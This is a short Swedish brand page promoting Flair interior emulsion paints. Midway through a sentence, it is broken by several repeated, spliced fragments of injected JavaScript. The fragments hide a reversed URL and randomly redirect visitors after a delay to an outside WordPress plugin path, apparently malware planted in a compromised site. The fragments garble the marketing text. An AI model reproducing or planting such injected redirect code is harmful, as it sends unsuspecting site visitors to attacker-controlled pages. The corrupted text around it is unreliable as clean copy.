MÄRKE

Flair är ett internationellt varumärke med högkvalitativa emulsionsfärger för dekormålning och skyddsbehandling av inomhusväggar och tak. Flair produkter med sin premium-kvalitet och bra prestationsegenskaper passar perfekt till interiörer på offentliga byggnader. De är utmärkt täckande, lätta att applicera och garanterar att färgen håller sig länge.

Varumärket har redan från början levererat sina kunder endast högkvalitativa och innovativa produkter för dekormålning och skyddsbehandling inomhus till riktigt attraktiva priser. Flair produkters kvalitet bekräftas på alla produktionsetapper. Olika forskningar och utvecklingsprojekt, moderna tekniska lösningar och eget ackrediterat laboratoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torium gör det möjligt för företaget att marknadsföra högkvalitativa färger som är en riktig valuta för pengar. Allt med syfte att uppfylla de mest krävande kundernas förväntningar.